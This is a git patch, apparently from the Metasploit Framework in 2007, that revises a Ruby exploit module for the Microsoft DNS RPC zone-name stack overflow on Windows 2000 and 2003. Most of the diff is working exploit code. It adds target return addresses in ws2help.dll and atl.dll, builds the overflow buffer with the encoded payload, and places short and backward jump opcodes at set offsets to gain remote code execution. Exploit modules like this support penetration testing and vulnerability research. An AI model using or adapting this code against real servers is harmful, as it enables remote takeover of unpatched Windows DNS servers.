From 17082dda1af5195951dafe30e335d23160b3b1fe Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sun, 15 Apr 2007 21:43:30 +0000
Subject: [PATCH] Almost done...

git-svn-id: file:///home/svn/framework3/trunk@4683 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/windows/dcerpc/msdns_zonename.rb | 47 +++++++++++++++----
 1 file changed, 37 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/windows/dcerpc/msdns_zonename.rb b/modules/exploits/windows/dcerpc/msdns_zonename.rb
index a5d78d784b..8ba3c48726 100644
--- a/modules/exploits/windows/dcerpc/msdns_zonename.rb
+++ b/modules/exploits/windows/dcerpc/msdns_zonename.rb
@@ -37,12 +37,16 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 					['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx']
 				],
 			'Privileged'     => true,
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread'
+				},			
 			'Payload'        =>
 				{
 					'Space'    => 1024,
 					
 					# The payload doesn't matter, but make_nops() uses these too
-					'BadChars' => "\x00\x5c\x5f\x31\x32\x33\x34\x35\x36\x37",
+					'BadChars' => "\x00",
 					
 					'StackAdjustment' => -3500,
 
@@ -50,12 +54,26 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 			'Platform'       => 'win',
 			'Targets'        => 
 				[
+					[ 'Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English',
+						{ 
+							'Addresses' => # Offsets must not overlap -4 or +9
+							[
+								[ 1213, 0x75022ac4 ], # Windows 2000 SP0-SP4 ws2help.dll
+								[ 1593, 0x7ffc0960 ], # Windows 2003 SP0 ??? (unreliable?)
+								[ 1633, 0x76a81a60 ], # Windows 2003 SP1-SP2 atl.dll
+							]
+						}
+					],
+				
 					# WS2HELP.DLL
 					[ 'Windows 2000 Server SP0-SP4+ English', { 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
-					
-					# ATL.DLL (checked)
-					[ 'Windows 2003 Server SP0 Checked/Debug English', { 'Off' => 1597, 'Ret' => 0x7669b5c5 } ],
-										
+
+					# Unknown, probably bad :(
+					[ 'Windows 2003 Server SP0 English', { 'Off' => 1593, 'Ret' => 0x7ffc0960 } ],
+	
+					# ATL.DLL (no SafeSEH)
+					[ 'Windows 2003 Server SP1-SP2 English', { 'Off' => 1633, 'Ret' => 0x76a81a60 } ],
+									
 				],
 			'DisclosureDate' => 'Apr 13 2007'
 			))
@@ -89,13 +107,22 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 		dcerpc_bind(handle)
 		print_status("Bound to #{handle} ...")
 
-		txt = Rex::Text.pattern_create(8192)
+		txt = Rex::Text.rand_text_alphanumeric(8192)
 		txt[0, payload.encoded.length] = payload.encoded
 		
-		off = target['Off']
-		txt[ off ] = [target.ret].pack('V')
-		txt[ off - 4, 2] = "\xeb\x06"
-		txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')		
+		if (target['Addresses'])
+			target['Addresses'].each do |ent|
+				off, ret = ent
+				txt[ off ] = [ret].pack('V')
+				txt[ off - 4, 2] = "\xeb\x06"
+				txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')				
+			end
+		else
+			off = target['Off']
+			txt[ off ] = [target.ret].pack('V')
+			txt[ off - 4, 2] = "\xeb\x06"
+			txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')		
+		end
 		
 		req = ''